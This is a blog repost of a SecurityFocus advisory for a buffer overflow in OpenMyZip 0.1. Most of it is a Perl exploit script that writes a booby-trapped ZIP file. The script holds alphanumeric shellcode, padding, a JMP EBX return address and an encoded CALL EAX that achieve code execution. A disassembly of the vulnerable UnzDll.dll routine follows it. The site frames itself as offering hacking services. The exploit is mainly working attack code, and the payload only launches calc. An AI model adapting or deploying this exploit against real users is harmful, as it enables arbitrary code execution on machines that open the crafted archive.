Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86376407

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/47678/info


OpenMyZip is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

OpenMyZip 0.1 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl
#
#
#[+]Exploit Title: OpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability
#[+]Date: 02\05\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/OpenMyZip/3000-2250_4-10657274.html
#[+]Version: v0.1
#[+]Tested On: WIN-XP SP3 Brazil Portuguese
#[+]CVE: N/A
#
#
#

use strict;
use warnings;

my $filename = "Exploit.zip"; 


print "\n\n\t\tOpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";

print "\n\n[+] Creting ZIP File...\n";
sleep(1);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

my $payload = "\x41" x 8;
$payload = $payload.
("\x61" x 7).#6 POPAD
("\x6A\x30").#PUSH 30
("\x5B\x52\x59").#POP EBX / PUSH EDX / POP ECX
("\x41" x 10).#10 INC EAX
("\x02\xd3").#ADD CL,BL
("\x51\x58").#PUSH ECX / POP EAX
("\x98\xd1"); #BASE CONVERSION 
                #"\x98" == "\xff" 
				# "\xd1" == "\xd0" 	
			    #"\xff" + "\xd0" = CALL EAX AND CODE EXECUTION.;-}
$payload .= "\x41" x 22;#MORE PADDING FOR START FROM MY SHELLCODE
$payload .= 
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYK9PFQO9OO3LUFRPHLN9R".
"TFDZTNQ5NV8VQSHR8MSM8KLUSRXRHKDMUVPBXOLSUXI48X6FCJUZSODNNCMTBOZ7JP2ULOOU2JMUMPTN".
"5RFFIWQM7MFSPZURQYZ5V05ZU4TO7SLKK5KEUBKJPQ79MW8KM12FXUK92KX9SZWWK2ZHOPL0O13XSQCO".#Alpha SHELLCODE WinExec('calc',0) BaseAddress = EAX
"T67JW9HWKLCLNK3EOPWQCE4PQ9103HMZUHFJUYQ3NMHKENJL1S5NHWVJ97MGK9PXYKN0Q51864NVOMUR".
"9K7OGT86OPYJ03K9GEU3OKXSKYZA";
$payload .= "\x44" x (2050-length($payload));
$payload .= "\x58\x78\x39".#POP EAX / JS SHORT 011E0098
"\x41" x 5;# PADDING FOR OVERWRITE EIP
$payload .= pack('V',0x00404042);#JMP EBX
$payload .= "\x42" x 50;
$payload .= "\x41" x (4064-length($payload));

$payload = $payload.".txt";
my $zip = $head.$payload.$head2.$payload.$head3;
open(FILE,">$filename") || die "[-]Error:\n$!\n";
print FILE $zip;
close(FILE);
print "[+] ZIP File Created With Sucess:)\n";
sleep(2);
=head
#
#The Vulnerable Function:
#
#
#The Vulnerable function is in MODULE UnzDll.dll on
#Function UnzDllExec+0x7a3 after CALL the function kernel32.lstrcpyA
#ocorrs the Buffer Overflow on movimentation of the String Very large.
#
#Assemble:
#
#  0x00DA6A6F                                      53               PUSH EBX
#  0x00DA6A70                                      56               PUSH ESI
#  0x00DA6A71                                      8B75 08          MOV ESI,DWORD PTR SS:[EBP+8]
#  0x00DA6A74                                      8B55 18          MOV EDX,DWORD PTR SS:[EBP+18]
#  0x00DA6A77                                      8B45 10          MOV EAX,DWORD PTR SS:[EBP+10]
#  0x00DA6A7A                                      83BE 8CD20000 00 CMP DWORD PTR DS:[ESI+D28C],0
#  0x00DA6A81                                      8D9E 50D80000    LEA EBX,DWORD PTR DS:[ESI+D850]
#  0x00DA6A87                                      74 65            JE SHORT UnzDll.00DA6AEE
#  0x00DA6A89                                      8B8E 84D20000    MOV ECX,DWORD PTR DS:[ESI+D284]
#  0x00DA6A8F                                      890B             MOV DWORD PTR DS:[EBX],ECX
#  0x00DA6A91                                      8B8E 88D20000    MOV ECX,DWORD PTR DS:[ESI+D288]
#  0x00DA6A97                                      894B 04          MOV DWORD PTR DS:[EBX+4],ECX
#  0x00DA6A9A                                      33C9             XOR ECX,ECX
#  0x00DA6A9C                                      C743 08 A0000000 MOV DWORD PTR DS:[EBX+8],0A0
#  0x00DA6AA3                                      894B 0C          MOV DWORD PTR DS:[EBX+C],ECX
#  0x00DA6AA6                                      8B4D 0C          MOV ECX,DWORD PTR SS:[EBP+C]
#  0x00DA6AA9                                      894B 10          MOV DWORD PTR DS:[EBX+10],ECX
#  0x00DA6AAC                                      81BE 88DB0000 91>CMP DWORD PTR DS:[ESI+DB88],91
#  0x00DA6AB6                                      7F 0A            JG SHORT UnzDll.00DA6AC2
#  0x00DA6AB8                                      8BC8             MOV ECX,EAX
#  0x00DA6ABA                                      80E1 FF          AND CL,0FF
#  0x00DA6ABD                                      0FBEC9           MOVSX ECX,CL
#  0x00DA6AC0                                      EB 02            JMP SHORT UnzDll.00DA6AC4
#  0x00DA6AC2                                      8BC8             MOV ECX,EAX
#  0x00DA6AC4                                      894B 14          MOV DWORD PTR DS:[EBX+14],ECX
#  0x00DA6AC7                                      85D2             TEST EDX,EDX
#  0x00DA6AC9                                      8B45 14          MOV EAX,DWORD PTR SS:[EBP+14]
#  0x00DA6ACC                                      8943 18          MOV DWORD PTR DS:[EBX+18],EAX
#  0x00DA6ACF                                      75 06            JNZ SHORT UnzDll.00DA6AD7
#  0x00DA6AD1                                      C643 1C 00       MOV BYTE PTR DS:[EBX+1C],0
#  0x00DA6AD5                                      EB 0A            JMP SHORT UnzDll.00DA6AE1
#  0x00DA6AD7                                      52               PUSH EDX
#  0x00DA6AD8                                      8D53 1C          LEA EDX,DWORD PTR DS:[EBX+1C]
#  0x00DA6ADB                                      52               PUSH EDX
#  0x00DA6ADC                                      E8 ABF20000      CALL UnzDll.00DB5D8C                     ; JMP to kernel32.lstrcpyA
#  0x00DA6AE1                                      53               PUSH EBX
#  0x00DA6AE2                                      FF96 8CD20000    CALL DWORD PTR DS:[ESI+D28C]             ; Here ocorrs the Code Execution:-)
#  0x00DA6AE8                                      0986 70D20000    OR DWORD PTR DS:[ESI+D270],EAX
#  0x00DA6AEE                                      5E               POP ESI
#  0x00DA6AEF                                      5B               POP EBX
#  0x00DA6AF0                                      5D               POP EBP
#  0x00DA6AF1                                      C3               RETN
#
#
#
#
#
=cut